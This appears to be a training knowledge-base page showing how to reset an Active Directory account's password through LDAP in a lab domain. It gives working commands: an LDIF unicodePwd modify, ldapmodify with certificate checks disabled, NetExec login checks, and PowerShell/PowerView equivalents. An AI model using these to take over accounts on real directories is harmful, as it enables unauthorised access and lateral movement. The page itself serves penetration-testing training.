Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 02. Protocols / LDAP / Techniques

Password Reset

Password resets through LDAP write the unicodePwd attribute. AD requires LDAPS or another protected channel, and the new password must be wrapped in quotes, encoded as UTF-16LE, then base64-encoded in LDIF.

export DC=10.10.10.200
export DOMAIN=ootw.local
export USER='student'
export PASS='student'

Generate the encoded password:

echo -n '"Welcome1!"' | iconv -f utf-8 -t utf-16le | base64 -w0

LDIF password reset:

dn: CN=svc_web,OU=Service Accounts,OU=OOTW Lab,DC=ootw,DC=local
changetype: modify
replace: unicodePwd
unicodePwd:: IgBXAGUAbABjAG8AbQBlADEAIQAiAA==
-
replace: pwdLastSet
pwdLastSet: 0

Apply over LDAPS:

LDAPTLS_REQCERT=never ldapmodify -H ldaps://$DC:636 -D "$DOMAIN\\$USER" -w "$PASS" -f reset.ldif

Validate with NetExec:

nxc ldap $DC -d OOTW -u svc_web -p 'Welcome1!'
nxc smb $DC -d OOTW -u svc_web -p 'Welcome1!'

PowerShell:

$Password = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
Set-ADAccountPassword -Identity svc_web -Reset -NewPassword $Password
Set-ADUser -Identity svc_web -ChangePasswordAtLogon $true

PowerView:

$CredPassword = ConvertTo-SecureString 'student' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('OOTW\student', $CredPassword)
$NewPassword = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
Set-DomainUserPassword -Identity svc_web -AccountPassword $NewPassword -Credential $Cred -Verbose